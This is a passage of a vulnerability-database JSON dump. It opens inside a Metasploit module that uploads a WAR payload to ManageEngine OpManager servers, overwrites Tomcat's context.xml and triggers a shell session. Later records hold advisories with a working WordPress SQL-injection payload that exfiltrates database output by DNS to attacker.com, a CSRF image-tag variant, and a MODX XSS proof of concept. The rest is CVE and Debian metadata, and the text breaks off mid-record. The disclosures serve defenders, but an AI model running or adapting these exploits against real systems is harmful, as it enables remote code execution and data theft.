Fix that by uploading a new context.xml file.\r\n# The file we are uploading has the same content apart from privileged=\"false\" and lots of XML\r\ncomments.\r\n# After replacing the context.xml file let's upload the WAR again.\r\nprint_status(\"#{peer} - Replacing Tomcat context file\")\r\nsend_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context\r\nprivileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},\r\n'ctype' => 'application/xml',\r\n'vars_get' => {\r\n'regionID' => tomcat_path + \"conf\",\r\n'FILENAME' => \"context.xml\"\r\n}\r\n})\r\nelse\r\n# We need to create the upload directories before our first attempt to upload the WAR.\r\nprint_status(\"#{peer} - Creating upload directories\")\r\nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\nsend_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\r\n'ctype' => 'application/xml',\r\n'vars_get' => {\r\n'regionID' => \"\",\r\n'FILENAME' => bogus_file\r\n}\r\n})\r\nregister_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file)\r\nend\r\n\r\nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s\r\n\r\nprint_status(\"#{peer} - Uploading WAR file...\")\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => war_payload,\r\n'ctype' => 'application/octet-stream',\r\n'vars_get' => {\r\n'regionID' => tomcat_path + \"webapps\",\r\n'FILENAME' => app_base + \".war\"\r\n}\r\n})\r\n\r\n# The server either returns a 500 error or a 200 OK when the upload is successful.\r\nif res and (res.code == 500 or res.code == 200)\r\nprint_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\r\n\" seconds for deployment\")\r\nsleep(datastore['SLEEP'])\r\nelse\r\nfail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload 
failed\")\r\nend\r\n\r\nprint_status(\"#{peer} - Executing payload, wait for session...\")\r\nsend_request_cgi({\r\n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\r\n'method' => 'GET'\r\n})\r\nend\r\n\r\n\r\ndef exploit\r\napp_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\nupload_war_and_exec(false, app_base)\r\nregister_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\")\r\n\r\nsleep_counter = 0\r\nwhile not session_created?\r\nif sleep_counter == datastore['SLEEP']\r\nprint_error(\"#{peer} - Failed to get a shell, let's try one more time\")\r\nupload_war_and_exec(true, app_base)\r\nreturn\r\nend\r\n\r\nsleep(1)\r\nsleep_counter += 1\r\nend\r\nend\r\nend\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager version 11.4 might not have the fix as the release is almost ready. They are planning to include the fix in OpManager version 11.5 which should be released sometime in late November or December 2014. 
No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/22712", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-06T03:35:34", "description": "WordPress All In One WP Security plugin version 3.8.2 suffers from multiple remote SQL injection vulnerabilities.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "zdt", "title": "WordPress All In One WP Security Plugin 3.8.2 SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "id": "1337DAY-ID-22694", "href": "https://0day.today/exploit/description/22694", "sourceData": "Product: All In One WP Security WordPress plugin\r\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \r\nVulnerable Version(s): 3.8.2 and probably prior\r\nTested Version: 3.8.2\r\nAdvisory Publication: September 3, 2014 [without technical details]\r\nVendor Notification: September 3, 2014 \r\nVendor Patch: September 12, 2014 \r\nPublic Disclosure: September 24, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-6242\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. 
\r\n\r\n\r\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\r\n\r\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. 
In order to do so an attacker should trick a logged-in administrator to visit a web page with a CSRF exploit, e.g.:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\n\r\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. 
In order to do so an attacker should trick a logged-in administrator to visit a web page with a CSRF exploit, e.g.:\r\n\r\n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\">\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to All In One WP Security 3.8.3\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\n\n# 0day.today [2018-03-06] #", "sourceHref": "https://0day.today/exploit/22694", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-20T11:17:25", "description": "MODX Revolution version 2.3.1-pl suffers from a reflective cross site scripting vulnerability.", "cvss3": {}, "published": "2014-09-18T00:00:00", "type": "zdt", "title": "MODX Revolution 2.3.1-pl Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-5451"], "modified": "2014-09-18T00:00:00", "id": "1337DAY-ID-22656", "href": "https://0day.today/exploit/description/22656", "sourceData": "Vendor: MODX\r\nVulnerable Version(s): 2.3.1-pl and probably prior\r\nTested Version: 2.3.1-pl\r\nAdvisory Publication: August 20, 2014 [without technical details]\r\nVendor Notification: August 20, 2014 \r\nVendor Patch: September 11, 2014 \r\nPublic Disclosure: September 17, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-5451\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by 
Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered a vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in MODX Revolution: CVE-2014-5451\r\n\r\nThe vulnerability exists due to insufficient sanitization of input data passed via the \"a\" HTTP GET parameter to the \"/manager/\" URL. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.\r\nThis vulnerability can be used against a website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over the web application.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display the \"immuniweb\" word:\r\n\r\nhttp://[host]/manager/?a=%22%20onload=%22javascript:alert%28/immuniweb/%29;%22%3E\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate \"manager/templates/default/header.tpl\" file from GitHub.\r\n\r\nMore Information:\r\nhttps://github.com/modxcms/revolution/issues/11966\r\nhttps://github.com/modxcms/revolution/commit/e36f80f18e9514204bf2ce82747c8adf7e47a9c9\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/22656", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "osv": [{"lastseen": "2022-08-10T07:08:16", "description": "\nMultiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.2.11-1.2+deb7u1.\n\n\nWe recommend 
that you upgrade your mantis packages.\n\n\n", "cvss3": {}, "published": "2014-09-20T00:00:00", "type": "osv", "title": "mantis - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2022-08-10T07:08:11", "id": "OSV:DSA-3030-1", "href": "https://osv.dev/vulnerability/DSA-3030-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T23:03:52", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3030-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 20, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mantis\nCVE ID : CVE-2014-1608 CVE-2014-1609\n\nMultiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.2.11-1.2+deb7u1.\n\nWe recommend that you upgrade your mantis packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-09-20T21:26:14", "type": "debian", "title": "[SECURITY] [DSA 3030-1] mantis security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-09-20T21:26:14", "id": "DEBIAN:DSA-3030-1:388DF", "href": "https://lists.debian.org/debian-security-announce/2014/msg00218.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:21:51", "description": "Multiple SQL injection vulnerabilities in MantisBT before 1.2.16 allow\nremote attackers to execute arbitrary SQL commands via unspecified\nparameters to the (1) mc_project_get_attachments function in\napi/soap/mc_project_api.php; the (2) news_get_limited_rows function in\ncore/news_api.php; the (3) summary_print_by_enum, (4) summary_print_by_age,\n(5) summary_print_by_developer, (6) summary_print_by_reporter, or (7)\nsummary_print_by_category function in core/summary_api.php; the (8)\ncreate_bug_enum_summary or (9) enum_bug_group function in\nplugins/MantisGraph/core/graph_api.php; (10) bug_graph_bycategory.php or\n(11) bug_graph_bystatus.php in plugins/MantisGraph/pages/; or (12)\nproj_doc_page.php, related to use of the db_query function, a different\nvulnerability than CVE-2014-1608.", "cvss3": {}, "published": "2014-03-20T00:00:00", "type": "ubuntucve", "title": "CVE-2014-1609", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 
7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-03-20T00:00:00", "id": "UB:CVE-2014-1609", "href": "https://ubuntu.com/security/CVE-2014-1609", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:19:14", "description": "Zarafa WebAccess 7.1.10 and WebApp 1.6 beta uses weak permissions (644) for\nconfig.php, which allows local users to obtain sensitive information by\nreading the PHP session files. NOTE: this vulnerability exists because of\nan incomplete fix for CVE-2014-0103.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=658433>\n", "cvss3": {}, "published": "2014-10-20T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5447", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0103", "CVE-2014-5447"], "modified": "2014-10-20T00:00:00", "id": "UB:CVE-2014-5447", "href": "https://ubuntu.com/security/CVE-2014-5447", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:51:19", "description": "Zarafa Collaboration Platform 4.1 uses world-readable permissions for\n/etc/zarafa/license, which allows local users to obtain sensitive\ninformation by reading license files.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=658433>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-03-19T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5450", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5450"], "modified": "2018-03-19T00:00:00", "id": "UB:CVE-2014-5450", "href": "https://ubuntu.com/security/CVE-2014-5450", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:19:04", "description": "Cross-site scripting (XSS) vulnerability in the micro history\nimplementation in phpMyAdmin 4.0.x before 4.0.10.3, 4.1.x before 4.1.14.4,\nand 4.2.x before 4.2.8.1 allows remote attackers to inject arbitrary web\nscript or HTML, and consequently conduct a cross-site request forgery\n(CSRF) attack to create a root account, via a crafted URL, related to\njs/ajax.js.", "cvss3": {}, "published": "2014-11-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-6300", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": 
"AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-11-08T00:00:00", "id": "UB:CVE-2014-6300", "href": "https://ubuntu.com/security/CVE-2014-6300", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:19:32", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.0.x\nbefore 4.0.10.4, 4.1.x before 4.1.14.5, and 4.2.x before 4.2.9.1 allow\nremote authenticated users to inject arbitrary web script or HTML via a\ncrafted ENUM value that is improperly handled during rendering of the (1)\ntable search or (2) table structure page, related to\nlibraries/TableSearch.class.php and libraries/Util.class.php.", "cvss3": {}, "published": "2014-10-03T00:00:00", "type": "ubuntucve", "title": "CVE-2014-7217", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-03T00:00:00", "id": "UB:CVE-2014-7217", "href": "https://ubuntu.com/security/CVE-2014-7217", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:20:15", "description": "server_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x before\n4.2.6 allows remote authenticated users to bypass intended access\nrestrictions and read the MySQL user list via a viewUsers request.", "cvss3": {}, "published": "2014-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4987", 
"bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4987"], "modified": "2014-07-20T00:00:00", "id": "UB:CVE-2014-4987", "href": "https://ubuntu.com/security/CVE-2014-4987", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:20:14", "description": "Multiple cross-site scripting (XSS) vulnerabilities in js/functions.js in\nphpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before\n4.2.6 allow remote authenticated users to inject arbitrary web script or\nHTML via a crafted (1) table name or (2) column name that is improperly\nhandled during construction of an AJAX confirmation message.", "cvss3": {}, "published": "2014-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4986", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4986"], "modified": "2014-07-20T00:00:00", "id": "UB:CVE-2014-4986", "href": "https://ubuntu.com/security/CVE-2014-4986", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:20:30", "description": "Multiple cross-site 
scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x\nbefore 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to\ninject arbitrary web script or HTML via a crafted table name that is\nimproperly handled after a (1) hide or (2) unhide action.", "cvss3": {}, "published": "2014-06-25T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4349", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4349"], "modified": "2014-06-25T00:00:00", "id": "UB:CVE-2014-4349", "href": "https://ubuntu.com/security/CVE-2014-4349", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:21:51", "description": "SQL injection vulnerability in the mci_file_get function in\napi/soap/mc_file_api.php in MantisBT before 1.2.16 allows remote attackers\nto execute arbitrary SQL commands via a crafted envelope tag in a\nmc_issue_attachment_get SOAP request.", "cvss3": {}, "published": "2014-03-18T00:00:00", "type": "ubuntucve", "title": "CVE-2014-1608", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608"], "modified": 
"2014-03-18T00:00:00", "id": "UB:CVE-2014-1608", "href": "https://ubuntu.com/security/CVE-2014-1608", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:24:31", "description": "Multiple SQL injection vulnerabilities in MantisBT before 1.2.16 allow remote attackers to execute arbitrary SQL commands via unspecified parameters to the (1) mc_project_get_attachments function in api/soap/mc_project_api.php; the (2) news_get_limited_rows function in core/news_api.php; the (3) summary_print_by_enum, (4) summary_print_by_age, (5) summary_print_by_developer, (6) summary_print_by_reporter, or (7) summary_print_by_category function in core/summary_api.php; the (8) create_bug_enum_summary or (9) enum_bug_group function in plugins/MantisGraph/core/graph_api.php; (10) bug_graph_bycategory.php or (11) bug_graph_bystatus.php in plugins/MantisGraph/pages/; or (12) proj_doc_page.php, related to use of the db_query function, a different vulnerability than CVE-2014-1608.", "cvss3": {}, "published": "2014-03-20T16:55:00", "type": "cve", "title": "CVE-2014-1609", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2021-01-12T18:05:00", "cpe": ["cpe:/a:mantisbt:mantisbt:1.2.11", "cpe:/a:mantisbt:mantisbt:1.2.10", "cpe:/a:mantisbt:mantisbt:1.2.0", "cpe:/a:mantisbt:mantisbt:1.2.3", "cpe:/a:mantisbt:mantisbt:1.2.6", "cpe:/a:mantisbt:mantisbt:1.2.15", "cpe:/a:mantisbt:mantisbt:1.2.7", "cpe:/o:debian:debian_linux:7.0", 
